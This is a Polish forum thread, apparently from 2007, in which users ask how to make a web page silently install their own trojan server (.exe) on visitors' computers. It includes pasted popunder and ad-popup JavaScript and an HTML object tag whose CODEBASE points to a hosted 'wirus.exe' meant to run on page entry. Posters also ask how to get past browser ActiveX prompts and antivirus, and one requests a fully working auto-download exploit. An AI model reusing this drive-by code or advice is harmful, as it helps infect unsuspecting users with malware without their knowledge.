Exe na stronie www

[x_quickshare_x]

Po wejściu na stronę: Nie wchodź jak nie przeczytasz dalej po dosłownie 5-10 sekundach do procesów już dochodzi plik.exe. Wychodzi na to że podrzucenie komuś serwerka jakiegoś trojana jest dość łatwe (jeśli sie umie taką stronkę zrobić). Mimo że mam kasperskiego i coś mu sie nie podobało to i tak exe sie odpalił i doszedł do procesów.
Moim celem pisania tego posta jest pytanie o to czy ktoś może obadać sposób działania tej strony i podać jakiś uproszczony tutorial - jak zrobić to samo z własnym exe?

Na tym forum jest duzo tematów z exe na stronie ale albo na coś trzeba kliknąć, coś zaakceptować albo albo albo... a tutaj klik na strone, 10 sekund i exe działa.

 

[djmentos]

pewno to jakis expolicik
szczegolnie podoba mi się ten skrypt, który ma fajną ścieżkę

<SCRIPT>

function pop(){

pu.DOM.Script.setTimeout("window.open('http://www.fpctraffic2.com/popunder/popunder.cgi?account=hujekmaly&track=A&r="+window.location.href+"&l='+navigator.browserLanguage,'_blank');");

pu.DOM.Script.setTimeout("self.focus();");

}

setTimeout('pop();',0);

</SCRIPT>

 

[x_quickshare_x]

No a jak przerobić tą stronkę żeby odpalała swój exe lub dodać coś takiego na zupełnie innej?

 

[japcok]

// Pop - Up Controller
// For AdultAdWorld.com
// Written by Joe 12 / 25 / 2005
// [email protected]
// www.adultadworld.com
// Updated by Joe 8 / 27 / 2006
<!-- Begin
var uri = "";
var expDays = 1;
// Number of days the cookie should last
var expHours = 1;
// Number of hours the cookie should last
var expMins = 1;
// Number of minutes the cookie should last
// var page = "http://partners.adultadworld.com/pc/1/59/&dp=0&my_title=&p=6"; // Pop Page to Go to
// var page = "http://partners.adultadworld.com/eb/24/CD1/0";
// var urlpage = "http://partners.adultadworld.com/eb/27/";
var urlpage = "http://newt1.adultadworld.com/jsc/z5/ff2.html?n=607;";
var urlcodes_end = ";d=15;w=1;h=1";
var qs = new Querystring();
var windowprops = "toolbar=1,location=1,directories=0,status=1,menubar=1,width=800,height=600,
scrollbars=1,resizable=1,top=0,left=0";

function GetCookie (name)
{
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen)
{
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0)
break;
}
return null;
}
function SetCookie (name, value)
{
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
function DeleteCookie (name)
{
var exp = new Date();
exp.setTime (exp.getTime() - 1);
var cval = GetCookie (name);
document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
}
var exp = new Date();
// exp.setTime(exp.getTime() + (expDays * 24 * 60 * 1 * 1000));
// exp.setTime(exp.getTime() + (3600 * expHours));
exp.setTime(exp.getTime() + (60000 * 60 * 6));
function amt()
{
var count = GetCookie('adultadworldcount')
if(count == null)
{
SetCookie('adultadworldcount', '1')
return 1
}
else
{
var newcount = parseInt(count) + 1;
DeleteCookie('adultadworldcount')
SetCookie('adultadworldcount', newcount, exp)
return count
}
}
function getCookieVal(offset)
{
var endstr = document.cookie.indexOf (";", offset);
if (endstr == - 1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}

var exit = true;

function adultadworldpop(pub,channel)
{
if((pub != null) && (channel != null)) {
uri = urlpage + "c=" + channel + ";s=" + pub + ";p=" + pub + urlcodes_end;
}
//alert(uri);
var count = GetCookie('adultadworldcount');
if (count == null)
{
count = 1;
SetCookie('adultadworldcount', count, exp);

if (exit)
{
window_handle = window.open(uri, "", windowprops);
if(window_handle)
{
// popped worked
window_handle.blur();
}
else
{
// not popped, use alternative method
// alert("Alternative Pop Method");

isXPSP2 = false;
openedWindow = null;

if( typeof(popedWindow) == "undefined" )
{
popedWindow = false
}
;

if( parseInt(navigator.appVersion) > 3 )
{
winWidth = screen.availWidth;
winHeight = screen.availHeight
}

if( window.SymRealWinOpen )
{
open = SymRealWinOpen;
}

if( window.NS_ActualOpen )
{
open = NS_ActualOpen;
}

checkXPSP2();

if( ! isXPSP2)
{
process_pop();
}
else
{
if(window.Event)
document.captureEvents(Event.CLICK);

document.onclick = process_clickpop;
}
self.focus();
process_clickpop();

}
}

}
else
{
count ++ ;
SetCookie('adultadworldcount', count, exp);
}
}

function Querystring(qs)
{
// optionally pass a querystring to parse
this.params = new Object()
this.get = Querystring_get

if (qs == null)
qs = location.search.substring(1, location.search.length)

if (qs.length == 0) return

// Turn < plus > back to < space >
// See : http : // www.w3.org / TR / REC - html40 / interact / forms.html#h - 17.13.4.1
qs = qs.replace(/+/g, ' ')
var args = qs.split('&') // parse out name / value pairs separated via &

// split out each name = value pair
for (var i = 0; i < args.length; i ++ )
{
var value;
var pair = args.split('=')
var name = unescape(pair[0])

if (pair.length == 2)
value = unescape(pair[1])
else
value = name

this.params[name] = value
}
}

function Querystring_get(key, default_)
{
// This silly looking line changes UNDEFINED to NULL
if (default_ == null) default_ = null;

var value = this.params[key]
if (value == null) value = default_;

return value
}

function checkXPSP2()
{
isXPSP2 = (navigator.userAgent.indexOf("SV1") != - 1);
}
function process_pop()
{
if ( ! popedWindow )
{
// alert(uri);
openedWindow = open(uri, "AAW0012342432", "scrollbars=1,resizable=1,menubar=1,location=1,top=0,left=0,width=" + winWidth + ",height=" + winHeight);

if(openedWindow)
{
popedWindow = true;
self.focus();
}
}
}

function process_clickpop()
{
if ( ! popedWindow )
{
if( ! isXPSP2)
{
// alert(uri);
openedWindow = open(uri, "AAW0012342432", "scrollbars=1,resizable=1,menubar=1,location=1,top=0,left=0,width=" + winWidth + ",height=" + winHeight);

self.focus();
if(openedWindow)
{
popedWindow = true;
}
}
}

if( ! popedWindow)
{
if( window.Event)
document.captureEvents(Event.CLICK);

document.onclick = process_pop;
self.focus();
}
}
// End -->[/b]

to co mi sie udalo wycignac z tej stronki : P

[ Dodano: 05-09-2007, 15:42 ]
a i u mnie nic nowego w procesach sie nei pojawilo

....

 

[energizer]

Witam
Dalem na wlasnym serwerze plik server.exe(od big bena ggv2.3) i wkleilem taki o to kod, by otworzylo ten plik exe odrazu jak sie wejdzie na strone:

<object width=0 height=0 CODEBASE="http://adres.twojej.strony/wirus.exe" classid
="CLSID:11111111-1111-1111-1111-111111111111" width=1 height=1></object>

otwieram strone przegladarka IE 6.0 i co prawda, antywirus krzyczy, ze znalazl trojana wiec postanowilem go wylaczyc. Po wylaczeniu w interner explorer pokazuje sie pasek informujacy, ze powstrzymal ta witryne przed instalacja formatu activeX. wiec klikam by uzyskac opcje i tam mam dopiero ten swoj plik server.exe
Co mam zrobic, by obejsc ten incydent, zeby odrazu po wejsciu na strone uruchomil sie nasz plik server.exe bez wiedzy uzytkownika?

 

[jurgensen]

Nie przejdzie to już nawet w nowszych IE

 

[B33RK4]

Włączyć obsługe ActiveX w opcjach na pewno znajdziesz.

 

[BlackGhost]

A jaki dokładnie proces dochodzi do procesów :
Bo komp mi słabiej działa a w procesach coś podejrzanego mi się wydaje :
hkcmd.exe i jest napisane w descripcion hkcmd module .
A Windows mi gadał że blokuje program który w satrcie sytemu się uruchamia to Orb .
Plz o pomoc mam Vistę i coś właśnie słabo ostatnio działa !!!! Pozdro !!!!

 

[akselekbezelek]

Originally posted by BlackGhost
A jaki dokładnie proces dochodzi do procesów :
Bo komp mi słabiej działa a w procesach coś podejrzanego mi się wydaje :
hkcmd.exe i jest napisane w descripcion hkcmd module .
A Windows mi gadał że blokuje program który w satrcie sytemu się uruchamia to Orb .
Plz o pomoc mam Vistę i coś właśnie słabo ostatnio działa !!!! Pozdro !!!!

Kaspersky to usunie (wszystko co dodaje sie do autostartu wylapuje) aha a zanim sciagnie av to wlacz w viscie ze masz av i neichcesz jej ochronny

 

[szycha1992]

<object width=0 height=0 CODEBASE="http://adres.twojej.strony/wirus.exe" classid
="CLSID:11111111-1111-1111-1111-111111111111" width=1 height=1></object>[/b]

Dalem Ten oto kod na moja stronke i po wejsciu na nia > KLIK po chwili wyskakuje mi komunikat o ActiveX i nastepnie chce mi pobrac plik xxx, ale Wyskakuje komunikat

i nic mi nie dochodzi do procesow itp. Jak temu zaradzic;s
lub Najlepiej podac w 100% dzialaja Exploit na Wlasnie automatyczne Sciaganie.
Prosze o Szybka Odpowiedz.